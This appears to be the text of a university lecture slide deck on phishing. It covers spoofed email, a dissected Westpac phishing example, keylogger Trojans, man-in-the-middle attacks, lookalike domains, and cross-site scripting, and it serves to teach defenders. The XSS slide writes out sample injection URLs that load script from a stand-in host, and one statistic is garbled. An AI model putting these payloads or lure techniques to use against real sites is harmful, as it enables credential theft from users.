Phishing Phishing 1 Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh
PhishingPhishing
1Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh
About me Currently, Lecturer in this department for
351 days Former Research Intern in M3C Laboratory,
University of Bolton, UK
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2
For you Email me at [email protected] if
you want My homepage and course materials are at
http://rushdishams.googlepages.com You need to join
http://groups.google.com/group/csebatchesofrushdi
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 3
Phishing The number of unique e-mail-based fraud
attacks detected in November 2005 was 16,882, almost double the 8,975 attacks launched in November 2004, said the report (Anti-Phishing Working Group)
Phishing e-mails pretend to come from legitimate companies, such as banks and e-commerce sites
Used by criminals to try and trick Web users into revealing personal information and account details
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 4
Phishing The number of brands targeted increased
by nearly 50 percent over the course of 2005, from 64 percent to 93 percent in November 2006
"One big attack will temporarily hurt a brand, but the increase in e-commerce is not slowing down," (Mark Murtagh, Websense technical director)
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 5
Phishing Top brands continue to be hijacked, with
phishers using established names to try to lure people to their sites
eBay is often spoofed, for obvious reasons Google is increasingly being targeted because
of its expansion into different business application models.
The big banking names are used too--HSBC, Citigroup, Lloyds--all the major brands
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 6
Phishing There's no point in using local names if the attack is
global Attacks are becoming increasingly sophisticated Web sites are hosting keylogging malicious software Before, people had to click on a site to download
malicious code. If they thought a web site 'phishy,' they could leave
and probably not be harmed. Now. with most phishing sites they just have to visit
one to become infected
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 7
Phishing Twenty-five percent of those sites now host
keylogging code If you visit one you will probably open yourself
to identity theft or fraud
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 8
Exploiting the Weakness Why is it that Crooks are able to mount an
attack? What are the weaknesses that they exploit? Richness of functionality
Complex systems can have program bugs Increasing interconnectivity
Separate functions of any system are combined and interconnected via Internet
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 9
Exploiting the Weakness Expanding market in exploits
Very few people requires as the technical gadgets are impressive and cheap
The scale of content based attacks Everyone uses e-mails and e-mails are
exploitable. Then why not?
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 10
Social Engineering Factors Phishing attacks rely upon a mix of technical
deceit and social engineering practices. In the majority of cases the Phisher must
persuade the victim The victim intentionally performs a series of
actions that will provide access to confidential information
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 11
Social Engineering Factors Communication channels such as email,
web-pages, IRC and instant messaging services are popular.
Phisher must impersonate a trusted source (e.g. the helpdesk of their bank, automated support response from their favourite online retailer, etc.) for the victim to believe.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 12
Social Engineering Factors
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 13
Phishing Techniques Phishing attacks initiated by email are the
most common. Using Trojan Network, Phishers can deliver
specially crafted emails to millions of legitimate “live” email addresses within a few hours
Sometimes phishers purchase e-mail address
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 14
Phishing Techniques Utilising well known flaws in the common
mail server communication protocol (SMTP), Phishers are able to create emails with fake “Mail From:” headers and impersonate any organisation they choose.
Any customer replies to the phishing email will be sent to them.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 15
Phishing Techniques Official looking and sounding emails Copies of legitimate corporate emails with
minor URL changes HTML based email used to obfuscate target
URL information Standard virus/worm attachments to emails
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 16
Phishing Techniques A plethora of anti spam-detection inclusions Crafting of “personalised” or unique email
messages Fake postings to popular message boards
and mailing lists Use of fake “Mail From:” addresses and
open mail relays for disguising the source of the email
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 17
A real-life phishing example
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 18
Things to note
The email was sent in HTML format Lower-case L’s have been replaced with upper-
case I’s. This is used to help bypass many standard anti-spam filters
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 19
Things to note
Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to a escape-encoded version of the following URL: http://olb.westpac.com.au.userdll.com:4903/ib/index.htm
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 20
Things to note
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 21
Things to note
The non-standard HTTP port of 4903 can be attributed to the fact that the Phishers fake site was hosted on a third-party PC that had been previously compromised by an attacker
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 22
Things to note
Recipients that clicked on the link were then forwarded to the real Westpac application.
However a JavaScript popup window containing a fake login page was presented to them.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 23
Things to note
This fake login window was designed to capture and store the recipient’s authentication credentials
JavaScript also submitted the authentication information to the real Westpac application
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 24
Where are they standing now? The inclusion of HTML disguised links The use of third-party supplied, or fake,
banner advertising graphics to lure customers The use of web-bugs (hidden items within the
page – such as a zero-sized graphic) to track a potential customer
The use of pop-up or frameless windows to disguise the true source of the Phishers message.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 25
Where are they standing now? Embedding malicious content within the
viewable web-page installs software of the Phishers choice (e.g.
key-loggers, screen-grabbers, back-doors and other Trojan horse programs).
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 26
Banner Advertising
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 27
IRC and IM New on the Phishers radar, IRC and Instant
Messaging (IM) forums are likely to become a popular phishing ground.
The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels,
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 28
Trojan Hosts the delivery source is increasingly becoming
home PC’s that have been previously compromised.
Trojan horse program has been installed which allows Phishers (along with Spammers, Warez Pirates, DDoS Bots, etc.) to use the PC as a message propagator.
tracking back a Phishing attack to an individual initiating criminal is extremely difficult.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 29
Trojan Hosts the installation of Trojan horse software is
on the increase, despite the efforts of large anti-virus companies.
operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon)
Phishers must be selective about the information they wish to record or be faced with information overload.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 30
Information Specific Trojans You have come across a file named JavaUtil.zip. But you forgot that you have “do not show
known file extensions” in your Windows setting. Hmm, then JavaUtil.zip originally maybe a .exe
file whose full name is JavaUtil.zip.exe You, unfortunately, click that zip file to unzip it. You are doomed!
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 31
Information Specific Trojans Early in 2004, a Phisher created a custom key-logger
Trojan. The Trojan key-logger was designed specifically to
capture all key presses within windows with the titles of various names including:- commbank, Commonwealth, NetBank, Citibank, Bank of America, e-gold, e-bullion, e-Bullion, evocash, EVOCash, EVOcash, intgold, INTGold, paypal, PayPal, bankwest, Bank West, BankWest, National Internet Banking, cibc, CIBC, scotiabank and ScotiaBank
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 32
Phishing Attack Vectors Man-in-the-middle Attacks URL Obfuscation Attacks Cross-site Scripting Attacks Preset Session Attacks
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 33
Man in the Middle Attacks the attacker situates themselves between the
customer and the real web-based application, and proxies all communications between the systems.
This form of attack is successful for both HTTP and HTTPS communications.
The customer connects to the attackers server as if it was the real site
The attackers server makes a simultaneous connection to the real site.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 34
Man in the Middle Attacks The attackers server then proxies all
communications between the customer and the real web-based application server
In the case of secure HTTPS communications, an SSL connection is established between the customer and the attackers proxy
while the attackers proxy creates its own SSL connection between itself and the real server.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 35
Man in the Middle Attacks
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 36
Man in the Middle Attacks The attacker must be able to direct the
customer to their proxy server instead of the real server.
This may be carried out through a number of methods:
Transparent Proxies DNS Cache Poisoning URL Obfuscation
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 37
Transparent Proxies Situated on the same network segment or
located on route to the real server a transparent proxy service can intercept all
data by forcing all outbound HTTP and HTTPS traffic through itself.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 38
DNS Cache Poisoning be used to disrupt normal traffic routing by
injecting false IP addresses for key domain names.
the attacker poisons the DNS cache of a network firewall so that all traffic destined for the MyBank IP address now resolves to the attackers proxy server IP address
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 39
URL Obfuscation the attacker tricks the customer into connecting to
their proxy server instead of the real server. the customer may follow a link tohttp://privatebanking.mybank.com.ch http://mybank.privatebanking.com http://privatebanking.mybonk.com http://privatebanking.mybánk.com http://privatebanking.mybank.hackproof.com And the real one ishttp://privatebanking.mybank.com
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 40
Third party shortened URL
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 41
Cross Site Scripting (XSS) make use of custom URL or code injection
into a valid web-based application URL the result of poor web-application
development processes.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 42
Cross Site Scripting (XSS) Full HTML substitution such as:
http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
Inline embedding of scripting content, such as:http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode
Forcing the page to load external scripting code, such as:
http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 43
Cross Site Scripting (XSS)
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 44
Preset Session Attack
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 45
Hidden Frame
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 46
Graphical Substitution
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 47
References The Phishing Guide by Next Generation
Security Software Software Limited.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 48
Related Papers Technical Trends in Phishing Attacks by
Jason Milletary Why Phishing Works by Dhamija et al.
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 49